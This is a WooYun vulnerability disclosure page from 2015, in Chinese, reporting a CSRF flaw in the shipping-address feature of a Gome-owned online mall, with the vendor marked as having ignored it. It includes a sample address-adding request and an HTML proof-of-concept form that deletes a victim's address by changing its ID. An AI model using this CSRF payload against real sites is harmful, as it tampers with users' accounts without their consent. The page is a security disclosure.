当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128126

漏洞标题:国美旗下商城存在CSRF漏洞

相关厂商:国美控股集团

漏洞作者: 路人甲

提交时间:2015-07-21 15:24

修复时间:2015-07-26 15:26

公开时间:2015-07-26 15:26

漏洞类型:CSRF

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

国美旗下商城存在CSRF漏洞

详细说明:

http://www.multigold.com.cn/


问题在收货地址,可删除 可添加
添加收货地址

http://member.multigold.com.cn/account/memberInfo_saveMemberAddress?newtime=1437460773098&isDefault=N&address1=%E5%95%8A%E5%A4%A7%E7%A5%9E%E5%A4%A7%E5%A4%9A%E6%98%AF&fullAddress=%E5%A4%A9%E6%B4%A5%E5%A4%A9%E6%B4%A5%E5%B8%82%E6%9C%9D%E9%98%B3%E5%8C%BA%E4%BA%94%E7%8E%AF%E9%87%8C%E5%B7%A6%E5%AE%B6%E5%BA%84%E3%80%81%E6%96%B0%E6%BA%90%E9%87%8C%E5%95%8A%E5%A4%A7%E7%A5%9E%E5%A4%A7%E5%A4%9A%E6%98%AF&post=111111&provinceId=12000000&cityId=12010000&areaId=11010200&streetId=11010203&consignee=%E5%95%8A%E5%AE%9E%E6%89%93%E5%AE%9E%E5%A4%A7%E5%B8%88%E7%9A%84&mobile1=13333333331&isDelete=N

漏洞证明:

删除收货地址 id随便改
POC

<html>
<body>
<form action="http://member.multigold.com.cn/account/memberInfo_updateMemberAddress?newtime=1437462010956" method="POST">
<input type="hidden" name="memberAddressId" value="3800" />
<input type="hidden" name="isDefault" value="" />
<input type="hidden" name="address1" value="" />
<input type="hidden" name="fullAddress" value="" />
<input type="hidden" name="post" value="" />
<input type="hidden" name="provinceId" value="" />
<input type="hidden" name="cityId" value="" />
<input type="hidden" name="areaId" value="" />
<input type="hidden" name="consignee" value="" />
<input type="hidden" name="mobile1" value="" />
<input type="hidden" name="isDelete" value="Y" />
<input type="hidden" name="tel" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

修复方案:

token

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-26 15:26

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无